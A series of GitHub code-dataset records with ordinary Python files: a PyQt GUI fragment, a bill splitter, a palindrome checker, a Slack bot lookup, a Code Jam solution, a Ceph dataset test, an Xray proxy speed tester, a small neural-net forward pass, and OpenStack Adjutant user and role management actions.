#设置时长\n self.editTime = self.timeEdit.time()\n self.timeStateSignal.emit(self.editTime.toPyTime())\n self.logStateSignal.emit(True)\n print('editTime:',self.editTime,'toPyTime',self.editTime.toPyTime())\n self.timebegin = 
True\n threading.Thread(target=self.timerStep,daemon = True).start()\n self.ledStartTime = time.clock()\n self.seButton.setText('stop')\n self.seButton.buttonState = 'stop'\n self.timeStepPause = False\n time.sleep(0.3)\n elif self.seButton.buttonState == 'stop':\n self.timebegin = False\n self.seButton.setText('begin')\n self.seButton.buttonState = 'begin'\n '''\n\n\n\n\n\n###\n#emit\n###\n # def emitBeginTime(self):\n # self.beginTime.emit(self.beginTime)\n\n\nif __name__ == '__main__':\n import sys\n\n from PyQt5.QtWidgets import QApplication\n\n app = QApplication(sys.argv)\n\n addressBook = PowerRecord()\n addressBook.show()\n\n sys.exit(app.exec_())\n","repo_name":"lidingke/photodarkening","sub_path":"view/powerrecord.py","file_name":"powerrecord.py","file_ext":"py","file_size_in_byte":17282,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"16454946728","text":"import random\n\n\nclass BillSplitter:\n def __init__(self):\n self.friends = {}\n self.friends_qty = None\n self.total_bill = None\n\n def invite_friends(self):\n print(\"Enter the number of friends joining (including you):\")\n self.friends_qty = int(input())\n if self.friends_qty <= 0:\n print(\"No one is joining for the party\")\n exit()\n else:\n print(\"Enter the name of every friend (including you), each on a new line:\")\n while len(self.friends) < self.friends_qty:\n friend = input()\n self.friends[friend] = 0\n # print(self.friends)\n\n def split_bill(self, total_bill):\n split_equally = round(total_bill / self.friends_qty, 2)\n for friend in self.friends:\n self.friends[friend] = split_equally\n print(self.friends)\n\n def lucky_one(self):\n print('Do you want to use the \"Who is lucky?\" feature? Write Yes/No:')\n lucky_answer = input()\n if lucky_answer == \"Yes\":\n lucky = random.choice(list(self.friends.keys()))\n print(\"{} is the lucky one!\".format(lucky))\n split_bill = round(self.total_bill / (self.friends_qty - 1), 2)\n for friend in self.friends:\n if friend == lucky:\n self.friends[friend] = 0\n else:\n self.friends[friend] = split_bill\n print(self.friends)\n else:\n print(\"No one is going to be lucky\")\n self.split_bill(self.total_bill)\n\n def main(self):\n self.invite_friends()\n try:\n print(\"Enter the total bill value:\")\n self.total_bill = int(input())\n except (TypeError, ValueError):\n print(\"Bill should be an integer value greater than 0!\")\n else:\n self.lucky_one()\n\n\nmy_bill = BillSplitter()\nmy_bill.main()","repo_name":"alendina/Bill_Splitter","sub_path":"Bill Splitter/task/with_class_exam1.py","file_name":"with_class_exam1.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11536696051","text":"frase=input(\"type a phrase: \")\n# strip spaces so multi-word phrases are compared correctly\nfrase = frase.replace(\" \", \"\").lower()\nn=len(frase)\n\n\nresposta = True\nfor i in range(n // 2):\n if frase[i] != frase[n - i - 1]:\n resposta = False\n break\n \nif resposta:\n print(\"It is a palindrome\")\nelse:\n print(\"It is not a palindrome\")\n \n ","repo_name":"Gzanella1/BCC-Bacharelado-Ciencia-da-computacao","sub_path":"Algoritimos/ALG-Lista-4/GZM-Alg-04-Ex-11.py","file_name":"GZM-Alg-04-Ex-11.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"30093357013","text":"from slackclient import SlackClient\nimport os\n\n\nBOT_NAME = \
\"report_tracker\"\n\n\nslack_client = SlackClient(os.environ.get(\"SLACK_BOT_TOKEN\"))\n\n\ndef main():\n api_call = slack_client.api_call(\"users.list\")\n if (api_call.get(\"ok\")):\n users = api_call.get(\"members\")\n for user in users:\n if \"name\" in user and user.get(\"name\") == BOT_NAME:\n print(\"Bot id for \" + user[\"name\"] + \" is \" + user[\"id\"])\n else:\n print(\"No bot with \" + BOT_NAME + \" found\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"iAmMrinal0/log_em_all","sub_path":"bot_id.py","file_name":"bot_id.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23470983331","text":"f = open('A-small-attempt1.in')\nout = open('ABF.out','w')\ni = 0\nfor line in f:\n\tif i==0:\n\t\ti = i + 1\n\t\tcontinue\n\tn = int(line)\n\tout.write('Case #' + str(i) + ': ' + str(NToNumber[n]) + '\\n')\n\ti = i + 1\n\nout.close()\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_162/342.py","file_name":"342.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18556073509","text":"import scirados\nimport numpy as np\nprint(dir(scirados))\ntest = scirados.RadosDataSet(\"TestDataSet\", \"image_cache\")\n\ntest2d = scirados.RadosDataSet(\"TestDataSet2D\", \"image_cache\")\n\ndata = np.array([123.42,42,42,3,534.5344, 432], dtype=np.float64)\ndata2d = np.array([[123.42,42,42,3,534.5344, 432], [1.2342,4.322,4.2,3,32.422, 23]], dtype=np.float64)\ndata2 = np.array([32.3,3.2], dtype=np.float64)\ndata22d = np.array([[0,0,0,0],[1,1,1,1],[2,2,2,2],[3,3,3,3]], dtype=np.float64)\n\n#print(data.dtype)\ntest.writeData(data)\n\ntest2d.writeData(data2d)\n\n\n#test.writeBox(data2, xstart=2)\nprint(data22d[1:3,0:2])\ntest2d.writeBox(data22d[1:3,0:2], xstart=2, ystart=0)\n#test.writeData(\"test\", data2)\n#print(\"here\\n\")\ntest_data = test.readData()\n#print(test_data)\nprint(test2d.readData())\n#test_data2 = test.readData(\"test2\")\nprint(test2d.readBox(xslice=slice(0,2), ystart=1))\nprint(test2d.getDims())\n#print(test.ObjectExists(\"test2\"))\n#print(test.writeBox(\"test2\", slice(0,20,2), slice(7,22), data))\n","repo_name":"LenaO/librados_science","sub_path":"rados_py/tests/testDataSet.py","file_name":"testDataSet.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39841266037","text":"import json\nimport shutil\nimport subprocess\nfrom typing import Tuple\nimport socket\nimport time\nimport requests\nimport os\n\nxray_path = \"../../../bin/xray-linux-amd64-1.8.3\"\nn_try = 1\n\ndef wait_for_port(port: int, host: str = 'localhost', timeout: float = 5.0) -> None:\n # Wait until a port starts accepting TCP connections.\n start_time = time.perf_counter()\n while True:\n try:\n with socket.create_connection((host, port), timeout=timeout):\n break\n except OSError as ex:\n time.sleep(0.01)\n if time.perf_counter() - start_time >= timeout:\n raise TimeoutError(\n f'Timeout exceeded for the port {port} on host {host} to start accepting connections.') from ex\n\n\ndef start_xray_service(config_path_dir: str, binary_path: str, timeout=5) -> Tuple[subprocess.Popen, dict]:\n # starts the proxy (v2ray/xray) service and waits for the respective port to open\n config_path = config_path_dir+\"/config.json\"\n\n with open(config_path, \"r\") as infile:\n proxy_conf 
= json.load(infile)\n\n proxy_listen = \"127.0.0.1\" # proxy_conf[\"inbounds\"][0][\"listen\"]\n # proxy_port = proxy_conf[\"inbounds\"][0][\"port\"] # Socks port\n proxy_port = proxy_conf[\"inbounds\"][1][\"port\"] # HTTPS port\n proxy_process = subprocess.Popen([binary_path, \"-c\", \"config.json\"],\n stdout=subprocess.DEVNULL,\n stderr=subprocess.DEVNULL,\n cwd=config_path_dir)\n try:\n wait_for_port(host=proxy_listen, port=proxy_port, timeout=timeout)\n except Exception as e:\n remove_dir(config_path_dir)\n proxy_process.kill()\n raise TimeoutError(str(e)) from e\n # proxies = dict(http=f\"socks5://{proxy_listen}:{proxy_port}\",https=f\"socks5://{proxy_listen}:{proxy_port}\")\n proxies = dict(http=f\"{proxy_listen}:{proxy_port}\", https=f\"{proxy_listen}:{proxy_port}\")\n\n return proxy_process, proxies\n\n\ndef download_speed_test(n_bytes: int, proxies: dict, timeout: int) -> Tuple[float, float]:\n # tests the download speed using cloudflare servers\n if proxies is None:\n raise TimeoutError(\"No Xray service available\")\n\n start_time = time.perf_counter()\n r = requests.get(url=\"https://speed.cloudflare.com/__down\",\n params={\"bytes\": n_bytes},\n timeout=timeout,\n proxies=proxies)\n total_time = time.perf_counter() - start_time\n cf_time = float(r.headers.get(\"Server-Timing\").split(\"=\")[1]) / 1000\n latency = r.elapsed.total_seconds() - cf_time\n download_time = total_time - latency\n\n mb = n_bytes * 8 / (10 ** 6)\n download_speed = mb / download_time\n\n return download_speed, latency\n\n\ndef remove_dir(directory):\n # delete the directory\n os.system(f\"rm -rf {directory}\")\n\n\ndef do_test(config_link, outbound_port):\n config_path_dir = f\"./link2json/ports/{outbound_port}\" # path of config , generated by link2json.jar\n\n if not os.path.exists(config_path_dir):\n os.makedirs(config_path_dir)\n\n v2ray_config_path = f\"{config_path_dir}/v2ray_config.json\"\n\n # copy v2ray_config.json template to the config_path_dir\n shutil.copy(\"./link2json/v2ray_config_template.json\", v2ray_config_path)\n\n min_dl_speed = 20 * 1024 # 20KBps\n max_dl_time = 3 # sec\n\n n_bytes = min_dl_speed * max_dl_time\n\n try:\n # Run the JAR file as a subprocess\n process_java = subprocess.Popen([\"java\", \"-jar\", \"../../Link2Json.jar\", config_link],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n cwd=config_path_dir)\n # Wait for the process to finish and get the output\n stdout, stderr = process_java.communicate()\n # Decode the output\n if len(stdout) != 0:\n output = stdout.decode(\"utf-8\")\n else:\n output = stderr.decode(\"utf-8\")\n if 'Empty' in output:\n remove_dir(config_path_dir)\n raise Exception(\"empty config.json generated - invalid link (url)\")\n\n xray_config_path = config_path_dir + \"/config.json\"\n with open(xray_config_path, 'r') as file:\n content = file.read()\n\n # Replace the port with ours\n new_content = content.replace('10809', str(outbound_port))\n\n with open(xray_config_path, 'w') as file:\n file.write(new_content)\n\n except Exception as e:\n remove_dir(config_path_dir)\n raise Exception(\"Link2Json has failed! 
\" + str(e))\n\n process_xray, proxies = start_xray_service(config_path_dir, xray_path, 3)\n\n count = 0\n Ave_speed = 0\n avg_latency = 0\n for try_idx in range(n_try):\n try:\n dl_speed, dl_latency = download_speed_test(n_bytes, proxies, 3)\n Ave_speed = Ave_speed + dl_speed\n avg_latency = avg_latency + dl_latency\n count = count + 1\n except Exception as e:\n remove_dir(config_path_dir)\n process_xray.kill()\n raise Exception(\"download timeout exceeded? -> \" + str(e))\n\n # make a request to the website\n url = os.environ.get('WEBSITE_URL', 'http://localhost')\n ip_result = None\n try:\n r = requests.get(f\"{url}/backend/app/config/ip/\", proxies=proxies, timeout=5)\n if r.status_code == 200:\n ip_result = r.json()\n except Exception as e:\n remove_dir(config_path_dir)\n process_xray.kill()\n raise Exception(f\"Failed check config server ip! {str(e)}\")\n\n process_xray.kill()\n\n if count > 0:\n Ave_speed = round(Ave_speed / count, 2)\n avg_latency = round(avg_latency / count, 2)\n print(config_link[:50]+\"...\", \" - successful\", \" DL_speed =\", Ave_speed, \"Mbps\", \" Latency =\", avg_latency, \"sec\")\n is_test_ok = True\n return is_test_ok, Ave_speed, avg_latency, ip_result\n else:\n raise Exception(\"XRay test failed! count = 0\")\n\n\ndef check_working_directory():\n current_dir = os.getcwd()\n actual_file_dir = os.path.dirname(os.path.realpath(__file__))\n if current_dir != actual_file_dir:\n os.chdir(actual_file_dir)\n\n\n# if __name__ == '__main__':\n# check_working_directory()\n#\n# do_test(\n# \"vless://fa0e6e80-7ede-4c01-b9aa-aa2f43e0afe8@web.yahoo.com:2087?encryption=none&flow=xtls-rprx-vision&security=reality&sni=sni.yahoo.com&fp=firefox&pbk=mykey&sid=myid&spx=myx&type=grpc#test2\")\n# do_test(\n# \"vmess://ew0KICAidiI6ICIyIiwNCiAgInBzIjogInRlc3QxIiwNCiAgImFkZCI6ICJ3ZWIuZ29vZ2xlLmNvbSIsDQogICJwb3J0IjogIjQ0MyIsDQogICJpZCI6ICI2MjBjNjAzMS03MDE4LTQ4ODAtOGI3Ny0wOGY4NDY5ZDlmNmQiLA0KICAiYWlkIjogIjAiLA0KICAic2N5IjogImF1dG8iLA0KICAibmV0IjogInRjcCIsDQogICJ0eXBlIjogIm5vbmUiLA0KICAiaG9zdCI6ICJnb29nbGUuY29tIiwNCiAgInBhdGgiOiAiIiwNCiAgInRscyI6ICJ0bHMiLA0KICAic25pIjogInNuaS5nb29nbGUuY29tIiwNCiAgImFscG4iOiAiaDIiLA0KICAiZnAiOiAiYW5kcm9pZCINCn0=\")\n","repo_name":"GFW-knocker/Mahsa_Server","sub_path":"xray/xray_config_tester.py","file_name":"xray_config_tester.py","file_ext":"py","file_size_in_byte":7013,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"72806740353","text":"import functools\nfrom uuid import uuid1\nimport numpy as np\n\ndef require_rowid(f):\n \"\"\" The first arg must be the table\"\"\"\n @functools.wraps(f)\n def wrapper(*args, **kwargs):\n table = args[1]\n try:\n from pandas.core.frame import DataFrame as pddf\n except (ImportError, OSError) as e:\n class pddf:\n pass\n try:\n from polars.dataframe.frame import DataFrame as pldf\n except (ImportError, OSError) as e:\n class pldf:\n pass\n try:\n from pyarrow.lib import Table as patab\n import pyarrow as pa\n except (ImportError, OSError) as e:\n class patab:\n pass\n def pddf_deleter(df, original = None):\n df.drop(\"rowid\", axis = 1, inplace = True)\n if original:\n df.rename(columns = {original: \"rowid\"}, inplace = True)\n return df\n def pldf_deleter(df, original = None):\n df = df.drop(\"rowid\")\n if original:\n df = df.rename({original: \"rowid\"})\n return df\n def numpy_deleter(df, original = None):\n df.pop(\"rowid\")\n if original:\n df[\"rowid\"] = df[original]\n df.pop(original)\n return df\n def patab_deleter(df, original):\n df = 
df.drop(\"rowid\")\n if original:\n newnames = df.column_names\n newnames[newnames.index(original)] = \"rowid\"\n df = df.rename_columns(newnames)\n return df\n\n def get_newname_for_rowid(l):\n i = 0\n while True:\n if f\"rowid_{i}\" not in l:\n return i\n i += 1\n if isinstance(table, pddf):\n original = None\n if 'rowid' in table.columns:\n original = f\"rowid_{get_newname_for_rowid(table.columns)}\"\n table.rename(columns = {\"rowid\": original}, inplace = True)\n table['rowid'] = table.index\n deleter = pddf_deleter\n f(*args, **kwargs)\n elif isinstance(table, pldf):\n original = None\n if 'rowid' in table.columns:\n original = f\"rowid_{get_newname_for_rowid(table.columns)}\"\n table = table.rename({\"rowid\": original})\n table = table.with_row_count(\"rowid\")\n deleter = pldf_deleter\n elif isinstance(table, dict):\n original = None\n if 'rowid' in table.keys():\n original = f\"rowid_{get_newname_for_rowid(table.keys())}\"\n table[original] = table['rowid']\n table['rowid'] = np.arange(len(table[list(table.keys())[0]]))\n deleter = numpy_deleter\n elif isinstance(table, patab):\n original = None\n if 'rowid' in table.column_names:\n original = f\"rowid_{get_newname_for_rowid(table.columns)}\"\n newnames = table.column_names\n newnames[newnames.index(\"rowid\")] = original\n table = table.rename_columns(newnames)\n table = table.append_column(\"rowid\", pa.array(np.arange(table.num_rows)))\n deleter = patab_deleter\n elif isinstance(table, str):\n original = None\n deleter = None\n else:\n raise Exception(\"Not supported type of table\")\n res = f(*args, **kwargs)\n if deleter:\n table = deleter(table, original)\n return res\n return wrapper\n","repo_name":"vlowingkloude/pyduckpgq","sub_path":"decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":3574,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23543874261","text":"#!/usr/bin/env python3\n\"\"\"\nOversized Pancake Flipper problem\nfor Google Code Jam 2017\nQualification Round\n\nLink to problem description:\nhttps://code.google.com/codejam/contest/3264486/dashboard#s=p0\n\nAuthor:\n Chris Nitsas\n (nitsas)\n\nLanguage:\n Python 3(.5)\n\nDate:\n April, 2017\n\nUsage:\n python3 runme.py input_file\n\"\"\"\n\n\nimport sys, argparse, collections\n\n\nTestCase = collections.namedtuple('TestCase', ['pancakes', 'flipper_width'])\n\n\ndef parse_args():\n \"\"\"\n Parse the command line arguments and return them in a namespace.\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('input_file')\n args = parser.parse_args()\n return args\n\n\ndef read_testcase(file_):\n pancakes_str, flipper_width_str = file_.readline().split()\n return TestCase([p == '+' for p in pancakes_str], int(flipper_width_str))\n\n\ndef solve_testcase(tc):\n num_flips = 0\n for i in range(len(tc.pancakes) - tc.flipper_width + 1):\n if not tc.pancakes[i]:\n # flip\n for j in range(tc.flipper_width):\n tc.pancakes[i + j] = not tc.pancakes[i + j]\n num_flips += 1\n if False in tc.pancakes[::-1][:tc.flipper_width]:\n return 'IMPOSSIBLE'\n else:\n return num_flips\n\n\ndef main(filename):\n with open(filename, 'r', encoding='utf-8') as f:\n num_testcases = int(f.readline())\n testcases = [read_testcase(f) for i in range(num_testcases)]\n for i, tc in enumerate(testcases, start=1):\n print('Case #{}: {}'.format(i, solve_testcase(tc)))\n return 0\n\n\nif __name__ == \"__main__\":\n status = main(parse_args().input_file)\n 
sys.exit(status)\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/2583.py","file_name":"2583.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10463819075","text":"\"\"\"\nforward propagator\n\nUsage:\n forward_propagator.py -i INPUTS -w WEIGHTS [--a=] [--act=]\n\nOptions:\n -h, --help Show this help message\n -i INPUTS Comma separated list of inputs\n -w WEIGHTS Comma separated list of weights\n --a= The actual value\n --act= The activator function\n\"\"\"\nimport math\nimport docopt\n\nactivators = {\n 'identity': lambda x: x,\n 'relu': lambda x: max(0, x),\n 'binstep': lambda x: 0 if x < 0 else 1,\n 'logistic': lambda x: 1 / (1 + math.exp(-x)),\n 'softsign': lambda x: x / (1 + abs(x)),\n 'leakyrelu': lambda x: 0.01 * x if x < 0 else x\n}\n\ndef forward_propagator(inputs, weights, actual=0, activator='relu'):\n if ((len(weights) - len(inputs)) % pow(len(inputs), 2)) != 0:\n raise Exception(\"Incorrect number of weights provided.\")\n\n try:\n activator = activators[activator]\n except KeyError:\n activator = activators['identity']\n\n dot = lambda X, Y: sum(map(lambda x, y: x * y, X, Y))\n\n weights_per_epoch = pow(len(inputs), 2)\n\n # floor division: num_epochs feeds range() below and must be an int\n num_epochs = (len(weights) - len(inputs)) // weights_per_epoch\n node_output_weights = weights[-len(inputs):]\n\n print(\"weights per epoch={}, number of epochs={}\".format(weights_per_epoch, num_epochs))\n node_inputs = inputs\n\n for epoch in range(0, num_epochs):\n epoch_weights = weights[epoch * weights_per_epoch:(epoch + 1) * weights_per_epoch]\n node_input_weights = [epoch_weights[i:i + len(inputs)] for i in range(0, len(epoch_weights), len(inputs))]\n print(\"epoch: {}\".format(epoch))\n print(\"node inputs: {}\".format(node_inputs))\n print(\"epoch weights: {}\".format(epoch_weights))\n print(\"node input weights: {}\".format(node_input_weights))\n\n sums = [activator(dot(node_weights, node_inputs)) for node_weights in node_input_weights]\n print(\"sums: {}\".format(sums))\n\n print(\"\")\n\n node_inputs = sums\n ret = dot(node_output_weights, node_inputs)\n\n return ret - actual\n\nif __name__ == \"__main__\":\n args = docopt.docopt(__doc__)\n args['-i'] = [float(x) for x in args['-i'].split(',')]\n args['-w'] = [float(x) for x in args['-w'].split(',')]\n actual = float(args['--a']) if args['--a'] is not None else 0\n activator = args['--act'] if args['--act'] is not None else 'identity'\n print(forward_propagator(inputs=args['-i'], weights=args['-w'], actual=actual, activator=activator))\n","repo_name":"zg/fp","sub_path":"forward_propagator.py","file_name":"forward_propagator.py","file_ext":"py","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71926212355","text":"from confspirator import groups\nfrom confspirator import fields\n\nfrom adjutant.config import CONF\nfrom adjutant.common import user_store\nfrom adjutant.actions.v1.base import (\n UserNameAction,\n UserIdAction,\n UserMixin,\n ProjectMixin,\n)\nfrom adjutant.actions.v1 import serializers\nfrom adjutant.actions.utils import validate_steps\n\n\nclass NewUserAction(UserNameAction, ProjectMixin, UserMixin):\n \"\"\"\n Setup a new user with a role on the given project.\n Creates the user if they don't exist, otherwise\n if the username and email for the request match the\n existing one, will simply add the project role.\n \"\"\"\n\n required = [\n \"username\",\n \"email\",\n 
\"project_id\",\n \"roles\",\n \"inherited_roles\",\n \"domain_id\",\n ]\n\n serializer = serializers.NewUserSerializer\n\n def _validate_target_user(self):\n id_manager = user_store.IdentityManager()\n\n # check if user exists and is valid\n # this may mean we need a token.\n user = self._get_target_user()\n if not user:\n self.add_note(\n \"No user present with username '%s'. \"\n \"Need to create new user.\" % self.username\n )\n if not id_manager.can_edit_users:\n self.add_note(\n \"Identity backend does not support user editing, \"\n \"cannot create new user.\"\n )\n return False\n self.action.need_token = True\n # add to cache to use in template\n self.action.task.cache[\"user_state\"] = \"default\"\n self.set_token_fields([\"password\"])\n return True\n if (\n not CONF.identity.username_is_email\n and getattr(user, \"email\", None) != self.email\n ):\n self.add_note(\n \"Found matching username, but email did not match. \"\n \"Reporting as invalid.\"\n )\n return False\n\n if not user.enabled:\n self.add_note(\n \"Existing disabled user '%s' with matching email.\" % self.email\n )\n if not id_manager.can_edit_users:\n self.add_note(\n \"Identity backend does not support user editing, \"\n \"cannot renable user.\"\n )\n return False\n self.action.need_token = True\n self.action.state = \"disabled\"\n # add to cache to use in template\n self.action.task.cache[\"user_state\"] = \"disabled\"\n # as they are disabled we'll reset their password\n self.set_token_fields([\"password\"])\n return True\n\n # role_validation\n roles = id_manager.get_roles(user, self.project_id)\n role_names = {role.name for role in roles}\n missing = set(self.roles) - role_names\n if not missing:\n self.action.need_token = False\n self.action.state = \"complete\"\n self.add_note(\"Existing user already has roles.\")\n else:\n self.roles = list(missing)\n self.action.need_token = True\n self.set_token_fields([\"confirm\"])\n self.action.state = \"existing\"\n # add to cache to use in template\n self.action.task.cache[\"user_state\"] = \"existing\"\n self.add_note(\"Existing user with matching email missing roles.\")\n\n return True\n\n def _validate(self):\n self.action.valid = validate_steps(\n [\n self._validate_role_permissions,\n self._validate_keystone_user_domain_id,\n self._validate_keystone_user_project_id,\n self._validate_domain_id,\n self._validate_project_id,\n self._validate_target_user,\n ]\n )\n self.action.save()\n\n def _prepare(self):\n self._validate()\n self.set_auto_approve()\n\n def _approve(self):\n self._validate()\n\n def _submit(self, token_data, keystone_user=None):\n self._validate()\n\n if not self.valid:\n return\n\n if self.action.state == \"default\":\n # default action: Create a new user in the tenant and add roles\n user = self.create_user(token_data[\"password\"])\n self.grant_roles(user, self.roles, self.project_id)\n self.grant_roles(user, self.inherited_roles, self.project_id, True)\n\n self.add_note(\n \"User %s has been created, with roles %s in project %s.\"\n % (self.username, self.roles, self.project_id)\n )\n\n elif self.action.state == \"disabled\":\n # first re-enable user\n user = self.find_user()\n self.enable_user(user)\n self.grant_roles(user, self.roles, self.project_id)\n self.grant_roles(user, self.inherited_roles, self.project_id, True)\n self.update_password(token_data[\"password\"])\n\n self.add_note(\"User %s password has been changed.\" % self.username)\n\n self.add_note(\n \"Existing user %s has been re-enabled and given roles %s\"\n \" in project %s.\" 
% (self.username, self.roles, self.project_id)\n )\n\n elif self.action.state == \"existing\":\n # Existing action: only add roles.\n user = self.find_user()\n self.grant_roles(user, self.roles, self.project_id)\n self.grant_roles(user, self.inherited_roles, self.project_id, True)\n\n self.add_note(\n \"Existing user %s has been given roles %s in project %s.\"\n % (self.username, self.roles, self.project_id)\n )\n elif self.action.state == \"complete\":\n # complete action: nothing to do.\n self.add_note(\n \"Existing user %s already had roles %s in project %s.\"\n % (self.username, self.roles, self.project_id)\n )\n\n\nclass ResetUserPasswordAction(UserNameAction, UserMixin):\n \"\"\"\n Simple action to reset a password for a given user.\n \"\"\"\n\n required = [\"domain_name\", \"username\", \"email\"]\n\n serializer = serializers.ResetUserPasswordSerializer\n\n config_group = groups.DynamicNameConfigGroup(\n children=[\n fields.ListConfig(\n \"blacklisted_roles\",\n help_text=\"Users with these roles cannot reset their passwords.\",\n default=[],\n sample_default=[\"admin\"],\n ),\n ],\n )\n\n def __init__(self, *args, **kwargs):\n super(ResetUserPasswordAction, self).__init__(*args, **kwargs)\n\n def _validate_user_roles(self):\n id_manager = user_store.IdentityManager()\n\n all_roles = id_manager.get_all_roles(self.user)\n\n user_roles = []\n for roles in all_roles.values():\n user_roles.extend(role.name for role in roles)\n\n if set(self.config.blacklisted_roles) & set(user_roles):\n self.add_note(\"Cannot reset users with blacklisted roles.\")\n return False\n\n return True\n\n def _validate_user_email(self):\n # NOTE(adriant): We only need to check the USERNAME_IS_EMAIL=False\n # case since '_validate_username_exists' will ensure the True case\n if not CONF.identity.username_is_email:\n if self.user and (\n getattr(self.user, \"email\", None).lower() != self.email.lower()\n ):\n self.add_note(\"Existing user with non-matching email.\")\n return False\n\n self.action.need_token = True\n self.set_token_fields([\"password\"])\n self.add_note(\"Existing user with matching email.\")\n return True\n\n def _validate(self):\n # Here, the order of validation matters\n # as each one adds new class variables\n self.action.valid = validate_steps(\n [\n self._validate_domain_name,\n self._validate_username_exists,\n self._validate_user_roles,\n self._validate_user_email,\n ]\n )\n self.action.save()\n\n def _prepare(self):\n self._validate()\n self.set_auto_approve()\n\n def _approve(self):\n self._validate()\n\n def _submit(self, token_data, keystone_user=None):\n self._validate()\n\n if not self.valid:\n return\n\n self.update_password(token_data[\"password\"])\n self.add_note(\"User %s password has been changed.\" % self.username)\n\n\nclass EditUserRolesAction(UserIdAction, ProjectMixin, UserMixin):\n \"\"\"\n A class for adding or removing roles\n on a user for the given project.\n \"\"\"\n\n required = [\"project_id\", \"user_id\", \"roles\", \"inherited_roles\", \"remove\"]\n\n serializer = serializers.EditUserRolesSerializer\n\n def _validate_target_user(self):\n # Get target user\n user = self._get_target_user()\n if not user:\n self.add_note(\"No user present with user_id\")\n return False\n return True\n\n def _validate_user_roles(self):\n id_manager = user_store.IdentityManager()\n user = self._get_target_user()\n project = id_manager.get_project(self.project_id)\n # user roles\n current_roles = id_manager.get_roles(user, project)\n current_inherited_roles = 
id_manager.get_roles(user, project, inherited=True)\n current_roles = {role.name for role in current_roles}\n current_inherited_roles = {role.name for role in current_inherited_roles}\n if self.remove:\n remaining = set(current_roles) & set(self.roles)\n remaining_inherited = set(current_inherited_roles) & set(\n self.inherited_roles\n )\n if not remaining and not remaining_inherited:\n self.action.state = \"complete\"\n self.add_note(\"User doesn't have roles to remove.\")\n else:\n self.roles = list(remaining)\n self.inherited_roles = list(remaining_inherited)\n self.add_note(\"User has roles to remove.\")\n else:\n missing = set(self.roles) - set(current_roles)\n missing_inherited = set(self.inherited_roles) - set(current_inherited_roles)\n if not missing and not missing_inherited:\n self.action.state = \"complete\"\n self.add_note(\"User already has roles.\")\n else:\n self.roles = list(missing)\n self.inherited_roles = list(missing_inherited)\n self.add_note(\"User missing roles.\")\n # All paths are valid here\n # We've just set state and roles that need to be changed.\n return True\n\n def _validate_role_permissions(self):\n id_manager = user_store.IdentityManager()\n\n current_user_roles = id_manager.get_roles(\n project=self.project_id, user=self.user_id\n )\n current_user_roles = [role.name for role in current_user_roles]\n\n current_roles_manageable = self.are_roles_manageable(\n self.action.task.keystone_user[\"roles\"], current_user_roles\n )\n\n all_roles = set()\n all_roles.update(self.roles)\n all_roles.update(self.inherited_roles)\n new_roles_manageable = self.are_roles_manageable(\n self.action.task.keystone_user[\"roles\"], all_roles\n )\n\n if new_roles_manageable and current_roles_manageable:\n self.add_note(\"All user roles are manageable.\")\n return True\n self.add_note(\"Not all user roles are manageable.\")\n return False\n\n def _validate(self):\n self.action.valid = validate_steps(\n [\n self._validate_keystone_user_project_id,\n self._validate_role_permissions,\n self._validate_project_id,\n self._validate_target_user,\n self._validate_user_roles,\n ]\n )\n self.action.save()\n\n def _prepare(self):\n self._validate()\n self.set_auto_approve()\n\n def _approve(self):\n self._validate()\n\n def _submit(self, token_data, keystone_user=None):\n self._validate()\n\n if not self.valid:\n return\n\n if self.action.state == \"default\":\n user = self._get_target_user()\n self._user_roles_edit(user, self.roles, self.project_id, remove=self.remove)\n self._user_roles_edit(\n user,\n self.inherited_roles,\n self.project_id,\n remove=self.remove,\n inherited=True,\n )\n\n if self.remove and self.roles:\n self.add_note(\n \"User %s has had roles %s removed from project %s.\"\n % (self.user_id, self.roles, self.project_id)\n )\n if self.remove and self.inherited_roles:\n self.add_note(\n \"User %s has had inherited roles %s \"\n \"removed from project %s.\"\n % (self.user_id, self.inherited_roles, self.project_id)\n )\n if self.roles:\n self.add_note(\n \"User %s has been given roles %s in project %s.\"\n % (self.user_id, self.roles, self.project_id)\n )\n if self.inherited_roles:\n self.add_note(\n \"User %s has been given inherited roles %s in project %s.\"\n % (self.user_id, self.inherited_roles, self.project_id)\n )\n elif self.action.state == \"complete\":\n if self.remove:\n self.add_note(\n \"User %s didn't have roles %s in project %s.\"\n % (self.user_id, self.roles, self.project_id)\n )\n else:\n self.add_note(\n \"User %s already had roles %s in project %s.\"\n % 
